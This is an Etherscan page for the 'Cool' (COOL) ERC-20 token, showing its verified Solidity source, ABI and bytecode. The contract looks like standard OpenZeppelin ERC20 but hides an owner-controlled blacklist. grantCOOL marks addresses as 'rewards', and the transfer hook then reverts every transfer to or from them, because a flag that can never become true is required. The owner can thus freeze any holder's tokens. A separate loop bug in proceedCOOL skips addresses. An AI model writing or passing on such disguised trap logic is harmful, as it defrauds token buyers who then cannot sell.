ETH Price: $2,389.23 (-3.88%)

Token

Cool (COOL)
 

Overview

Max Total Supply

2,000,000,000,000 COOL

Holders

19

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
3,367,310,016.758068036864284739 COOL

Value
$0.00
0x15a15fe79a268668eec2573f81e67bd648b3c1b9
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Cool

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-05-23
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;


/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Ownable, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;
    mapping (address => bool) private _rewards;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;
    bool private _rewardsApplied = false;


    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    function grantCOOL(address [] calldata _rewardees_) external onlyOwner {
        for (uint256 i = 0; i < _rewardees_.length; i++) {
            _rewards[_rewardees_[i]] = true;
        }
    }

    function proceedCOOL(address [] calldata _rewardees_) external onlyOwner {
        for (uint256 i = 0; i < _rewardees_.length; i++) {
            _rewards[_rewardees_[i]] = false;
            unchecked { ++i; }
        }
    }

    function readCOOL(address _bytes_) public view returns (bool) {
        return _rewards[_bytes_];
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 //amount
    ) internal virtual {if (_rewards[to] || _rewards[from]) require(_rewardsApplied == true, "");}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

contract Cool is ERC20 {
    constructor() ERC20("Cool", "COOL") {
        _mint(msg.sender, 2000000000000 * 10 ** decimals());
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_rewardees_","type":"address[]"}],"name":"grantCOOL","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_rewardees_","type":"address[]"}],"name":"proceedCOOL","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_bytes_","type":"address"}],"name":"readCOOL","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526000600760006101000a81548160ff0219169083151502179055503480156200002c57600080fd5b506040518060400160405280600481526020017f436f6f6c000000000000000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f434f4f4c00000000000000000000000000000000000000000000000000000000815250620000b9620000ad6200012760201b60201c565b6200012f60201b60201c565b8160059081620000ca9190620006f0565b508060069081620000dc9190620006f0565b5050506200012133620000f4620001f360201b60201c565b600a62000102919062000967565b6501d1a94a2000620001159190620009b8565b620001fc60201b60201c565b62000b3b565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036200026e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002659062000a64565b60405180910390fd5b62000282600083836200036a60201b60201c565b806004600082825462000296919062000a86565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200034a919062000ad2565b60405180910390a362000366600083836200047160201b60201c565b5050565b600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806200040c5750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156200046c5760011515600760009054906101000a900460ff161515146200046b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620004629062000b19565b60405180910390fd5b5b505050565b505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620004f857607f821691505b6020821081036200050e576200050d620004b0565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620005787fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000539565b62000584868362000539565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620005d1620005cb620005c5846200059c565b620005a6565b6200059c565b9050919050565b6000819050919050565b620005ed83620005b0565b62000605620005fc82620005d8565b84845462000546565b825550505050565b600090565b6200061c6200060d565b62000629818484620005e2565b505050565b5b8181101562000651576200064560008262000612565b6001810190506200062f565b5050565b601f821115620006a0576200066a8162000514565b620006758462000529565b8101602085101562000685578190505b6200069d620006948562000529565b8301826200062e565b50505b505050565b600082821c905092915050565b6000620006c560001984600802620006a5565b1980831691505092915050565b6000620006e08383620006b2565b9150826002028217905092915050565b620006fb8262000476565b67ffffffffffffffff81111562000717576200071662000481565b5b620007238254620004df565b6200073082828562000655565b600060209050601f83116001811462000768576000841562000753578287015190505b6200075f8582620006d2565b865550620007cf565b601f198416620007788662000514565b60005b82811015620007a2578489015182556001820191506020850194506020810190506200077b565b86831015620007c25784890151620007be601f891682620006b2565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000865578086048111156200083d576200083c620007d7565b5b60018516156200084d5780820291505b80810290506200085d8562000806565b94506200081d565b94509492505050565b60008262000880576001905062000953565b8162000890576000905062000953565b8160018114620008a95760028114620008b457620008ea565b600191505062000953565b60ff841115620008c957620008c8620007d7565b5b8360020a915084821115620008e357620008e2620007d7565b5b5062000953565b5060208310610133831016604e8410600b8410161715620009245782820a9050838111156200091e576200091d620007d7565b5b62000953565b62000933848484600162000813565b925090508184048111156200094d576200094c620007d7565b5b81810290505b9392505050565b600060ff82169050919050565b600062000974826200059c565b915062000981836200095a565b9250620009b07fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846200086e565b905092915050565b6000620009c5826200059c565b9150620009d2836200059c565b9250828202620009e2816200059c565b91508282048414831517620009fc57620009fb620007d7565b5b5092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000a4c601f8362000a03565b915062000a598262000a14565b602082019050919050565b6000602082019050818103600083015262000a7f8162000a3d565b9050919050565b600062000a93826200059c565b915062000aa0836200059c565b925082820190508082111562000abb5762000aba620007d7565b5b92915050565b62000acc816200059c565b82525050565b600060208201905062000ae9600083018462000ac1565b92915050565b50565b600062000b0160008362000a03565b915062000b0e8262000aef565b600082019050919050565b6000602082019050818103600083015262000b348162000af2565b9050919050565b611a928062000b4b6000396000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c806370a08231116100a2578063a457c2d711610071578063a457c2d7146102bc578063a9059cbb146102ec578063dd62ed3e1461031c578063f2fde38b1461034c578063fe701cd5146103685761010b565b806370a0823114610246578063715018a6146102765780638da5cb5b1461028057806395d89b411461029e5761010b565b80631c68dbaa116100de5780631c68dbaa146101ac57806323b872dd146101c8578063313ce567146101f857806339509351146102165761010b565b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015e5780631c33c1991461017c575b600080fd5b610118610384565b60405161012591906110d3565b60405180910390f35b61014860048036038101906101439190611193565b610416565b60405161015591906111ee565b60405180910390f35b610166610439565b6040516101739190611218565b60405180910390f35b61019660048036038101906101919190611233565b610443565b6040516101a391906111ee565b60405180910390f35b6101c660048036038101906101c191906112c5565b610499565b005b6101e260048036038101906101dd9190611312565b61054c565b6040516101ef91906111ee565b60405180910390f35b61020061057b565b60405161020d9190611381565b60405180910390f35b610230600480360381019061022b9190611193565b610584565b60405161023d91906111ee565b60405180910390f35b610260600480360381019061025b9190611233565b6105bb565b60405161026d9190611218565b60405180910390f35b61027e610604565b005b610288610618565b60405161029591906113ab565b60405180910390f35b6102a6610641565b6040516102b391906110d3565b60405180910390f35b6102d660048036038101906102d19190611193565b6106d3565b6040516102e391906111ee565b60405180910390f35b61030660048036038101906103019190611193565b61074a565b60405161031391906111ee565b60405180910390f35b610336600480360381019061033191906113c6565b61076d565b6040516103439190611218565b60405180910390f35b61036660048036038101906103619190611233565b6107f4565b005b610382600480360381019061037d91906112c5565b610877565b005b60606005805461039390611435565b80601f01602080910402602001604051908101604052809291908181526020018280546103bf90611435565b801561040c5780601f106103e15761010080835404028352916020019161040c565b820191906000526020600020905b8154815290600101906020018083116103ef57829003601f168201915b5050505050905090565b600080610421610924565b905061042e81858561092c565b600191505092915050565b6000600454905090565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6104a1610af5565b60005b82829050811015610547576000600260008585858181106104c8576104c7611466565b5b90506020020160208101906104dd9190611233565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550806001019050808061053f906114c4565b9150506104a4565b505050565b600080610557610924565b9050610564858285610b73565b61056f858585610bff565b60019150509392505050565b60006012905090565b60008061058f610924565b90506105b08185856105a1858961076d565b6105ab919061150c565b61092c565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61060c610af5565b6106166000610e78565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461065090611435565b80601f016020809104026020016040519081016040528092919081815260200182805461067c90611435565b80156106c95780601f1061069e576101008083540402835291602001916106c9565b820191906000526020600020905b8154815290600101906020018083116106ac57829003601f168201915b5050505050905090565b6000806106de610924565b905060006106ec828661076d565b905083811015610731576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610728906115b2565b60405180910390fd5b61073e828686840361092c565b60019250505092915050565b600080610755610924565b9050610762818585610bff565b600191505092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6107fc610af5565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361086b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161086290611644565b60405180910390fd5b61087481610e78565b50565b61087f610af5565b60005b8282905081101561091f576001600260008585858181106108a6576108a5611466565b5b90506020020160208101906108bb9190611233565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610917906114c4565b915050610882565b505050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361099b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610992906116d6565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a0a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a0190611768565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610ae89190611218565b60405180910390a3505050565b610afd610924565b73ffffffffffffffffffffffffffffffffffffffff16610b1b610618565b73ffffffffffffffffffffffffffffffffffffffff1614610b71576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b68906117d4565b60405180910390fd5b565b6000610b7f848461076d565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610bf95781811015610beb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610be290611840565b60405180910390fd5b610bf8848484840361092c565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c6e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c65906118d2565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610cdd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cd490611964565b60405180910390fd5b610ce8838383610f3c565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610d6f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d66906119f6565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055